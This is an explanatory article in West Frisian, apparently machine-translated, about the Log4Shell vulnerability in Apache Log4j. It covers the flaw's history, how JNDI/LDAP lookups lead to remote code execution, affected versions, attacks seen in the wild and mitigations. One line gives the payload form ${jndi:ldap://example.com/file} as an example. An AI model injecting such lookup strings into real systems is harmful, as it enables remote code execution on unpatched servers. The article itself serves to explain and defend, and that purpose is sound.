Table of Contents[Ferstopje][Toanje]
Ein novimber 2021 ûntdutsen wy in grutte bedriging foar cyberfeiligens. Dizze eksploitaasje soe mooglik ynfloed hawwe op miljoenen kompjûtersystemen wrâldwiid.
Dit is in hantlieding oer de kwetsberens fan Log4j en hoe't in oersjoen ûntwerpfout mear dan 90% fan 'e kompjûtertsjinsten fan' e wrâld iepen liet foar oanfal.
Apache Log4j is in iepen boarne Java-basearre logging-helpprogramma ûntwikkele troch de Apache Software Foundation. Oarspronklik skreaun troch Ceki Gülcü yn 2001, is it no diel fan Apache Logging Services, in projekt fan 'e Apache Software Foundation.
Bedriuwen oer de hiele wrâld brûke de Log4j-bibleteek om ynloggen op har applikaasjes mooglik te meitsjen. Yn feite is de Java-bibleteek sa ubiquitêr, jo kinne it fine yn applikaasjes fan Amazon, Microsoft, Google, en mear.
De promininsje fan 'e biblioteek betsjut dat elke potinsjele flater yn' e koade miljoenen kompjûters iepen litte kin foar hacking. Op 24 novimber 2021, a wolkfeiligens ûndersiker dy't wurke foar Alibaba ûntduts in skriklike flater.
De kwetsberens fan Log4j, ek wol Log4Shell neamd, bestie ûngemurken sûnt 2013. De kwetsberens lieten kweade akteurs koade útfiere op troffen systemen dy't Log4j draaie. It waard iepenbier iepenbiere op 9 desimber 2021
Yndustry-saakkundigen neame de Log4Shell-fout de grutste kwetsberens yn resinte ûnthâld.
Yn 'e wike nei de publikaasje fan' e kwetsberens ûntdutsen cybersecurity-teams miljoenen oanfallen. Guon ûndersikers observearre sels in taryf fan mear as hûndert oanfallen per minuut.
Hoe wurket it?
Om te begripen wêrom Log4Shell sa gefaarlik is, moatte wy begripe wat it yn steat is.
De kwetsberens fan Log4Shell soarget foar willekeurige koade-útfiering, wat yn prinsipe betsjut dat in oanfaller elke kommando of koade kin útfiere op in doelmasine.
Hoe docht it dit te berikken?
Earst moatte wy begripe wat de JNDI is.
De Java Naming and Directory Interface (JNDI) is in Java-tsjinst wêrmei Java-programma's gegevens en boarnen fia in namme kinne ûntdekke en opsykje. Dizze maptsjinsten binne wichtich om't se in organisearre set records leverje foar ûntwikkelders om maklik te ferwizen by it meitsjen fan applikaasjes.
De JNDI kin ferskate protokollen brûke om tagong te krijen ta in bepaalde map. Ien fan dizze protokollen is it Lightweight Directory Access Protocol, of LDAP.
By it loggen fan in tekenrige, log4j fiert tekenrige ferfangings út as se útdrukkingen fan 'e foarm tsjinkomme ${prefix:name}
.
Bygelyks, Text: ${java:version}
kin wurde oanmeld as Tekst: Java ferzje 1.8.0_65. Dizze soarten substitúsjes binne gewoanlik.
Wy kinne ek útdrukkingen hawwe lykas Text: ${jndi:ldap://example.com/file}
dy't it JNDI-systeem brûkt om in Java-objekt te laden fan in URL fia it LDAP-protokol.
Dit laadt effektyf de gegevens dy't fan dy URL komme yn 'e masine. Elke potinsjele hacker kin kweade koade hostje op in iepenbiere URL en wachtsje op masines dy't Log4j brûke om it oan te melden.
Sûnt de ynhâld fan logberjochten befetsje troch brûkers kontrolearre gegevens, kinne hackers har eigen JNDI-referinsjes ynfoegje dy't wize op LDAP-tsjinners dy't se kontrolearje. Dizze LDAP-tsjinners kinne fol wêze mei kweade Java-objekten dy't de JNDI kin útfiere troch de kwetsberens.
Wat dit slimmer makket, is dat it net útmakket as de applikaasje in server-side of in client-side applikaasje is.
Salang't der in manier is foar de logger om de kweade koade fan 'e oanfaller te lêzen, is de applikaasje noch altyd iepen foar eksploaten.
Wa wurdt beynfloede?
De kwetsberens hat ynfloed op alle systemen en tsjinsten dy't APache Log4j brûke, mei ferzjes 2.0 oant en mei 2.14.1.
Ferskate feiligenseksperts advisearje dat de kwetsberens ynfloed kin hawwe op in oantal applikaasjes dy't Java brûke.
De flater waard earst ûntdutsen yn it Microsoft-eigendom Minecraft fideospultsje. Microsoft hat har brûkers oproppen om har Java-edysje Minecraft-software op te upgrade om elk risiko te foarkommen.
Jen Easterly, de direkteur fan Cybersecurity and Infrastructure Security Agency (CISA) seit dat leveransiers in grutte ferantwurdlikens om foar te kommen dat ein brûkers fan kweade akteurs dizze kwetsberens brûke.
"Leanders moatte ek kommunisearje mei har klanten om te soargjen dat ein-brûkers witte dat har produkt dizze kwetsberens befettet en software-updates prioritearje moatte."
De oanfallen binne nei alle gedachten al begûn. Symantec, in bedriuw dat software foar cybersecurity leveret, hat in farieare oantal oanfalfersiken waarnommen.
Hjir binne wat foarbylden fan 'e soarten oanfallen dy't ûndersikers hawwe ûntdutsen:
- botnets
Botnets binne in netwurk fan kompjûters dy't ûnder de kontrôle binne fan in inkele oanfaller. Se helpe DDoS-oanfallen út te fieren, gegevens te stellen en oare oplichting. Undersikers observearre it Muhstik botnet yn shell skripts ynladen fan de Log4j eksploitaasje.
- XMRig Miner Trojan
XMRig is in iepenboarne cryptocurrency-miner dy't CPU's brûkt om it Monero-token te minen. Cyberkriminelen kinne XMRig ynstallearje op apparaten fan minsken, sadat se har ferwurkingskrêft brûke kinne sûnder har kennis.
- Khonsari Ransomware
Ransomware ferwiist nei in foarm fan malware ûntworpen om fersiferje triemmen op in kompjûter. Oanfallers kinne dan betelling easkje yn ruil foar it jaan fan tagong werom nei de fersifere bestannen. Undersikers ûntdutsen de Khonsari ransomware yn Log4Shell oanfallen. Se rjochtsje op Windows-tsjinners en meitsje gebrûk fan it .NET-kader.
Wat bart der aanst?
Eksperts foarsizze dat it moannen of miskien sels jierren kin duorje om de gaos dy't ûntstien is troch de Log4J-kwetsberens folslein te reparearjen.
Dit proses omfettet it bywurkjen fan elk troffen systeem mei in patched ferzje. Sels as al dizze systemen binne patched, d'r is noch altyd de dreigende bedriging fan mooglike efterdoarren dat hackers al oan it finster tafoege hawwe dat servers iepen wiene foar oanfal.
Folle oplossings en mitigaasjes bestean om foar te kommen dat applikaasjes wurde eksploitearre troch dizze brek. De nije Log4j ferzje 2.15.0-rc1 feroare ferskate ynstellings om dizze kwetsberens te ferminderjen.
Alle funksjes mei JNDI wurde standert útskeakele en opsykjen op ôfstân binne ek beheind. It útskeakeljen fan de opsykfunksje op jo Log4j-opset sil helpe om it risiko fan mooglike eksploaten te ferminderjen.
Bûten Log4j is d'r noch de needsaak foar in breder plan om eksploaten fan iepen boarne te foarkommen.
Earder yn maaie, it Wite Hûs útbrocht in bestjoerlike bestelling dy't as doel hie de nasjonale cyberfeiligens te ferbetterjen. It omfette in foarsjenning foar in software bill of materials (SBOM) dy't yn essinsje in formeel dokumint wie dat in list befette fan elk item nedich om de applikaasje te bouwen.
Dit omfettet dielen lykas de iepen Boarne pakketten, ôfhinklikens en API's brûkt foar ûntwikkeling. Hoewol it idee fan SBOM's nuttich binne foar transparânsje, sil it de konsumint echt helpe?
It opwurdearjen fan ôfhinklikens kin tefolle fan in gedoe wêze. Bedriuwen kinne gewoan kieze om boetes te beteljen yn stee fan it risiko dat ekstra tiid fergrieme mei it finen fan alternative pakketten. Miskien sille dizze SBOM's allinich nuttich wêze as har omfang wurdt fierder beheind.
Konklúzje
De Log4j-kwestje is mear dan allinich in technysk probleem foar organisaasjes.
Bedriuwslieders moatte bewust wêze fan potinsjele risiko's dy't kinne foarkomme as har servers, produkten of tsjinsten fertrouwe op koade dy't se sels net ûnderhâlde.
Fertrouwen op iepen boarne en applikaasjes fan tredden komt altyd mei wat risiko. Bedriuwen moatte beskôgje it útwurkjen fan strategyen foar mitigaasje fan risiko foardat nije bedrigingen oan it ljocht komme.
In grut part fan it web fertrout op iepen boarne software ûnderhâlden troch tûzenen frijwilligers wrâldwiid.
As wy it web in feilich plak wolle hâlde, moatte oerheden en bedriuwen ynvestearje yn finansiering fan iepen boarne-ynspanningen en cybersecurity-ynstânsjes lykas CISA.
Leave a Reply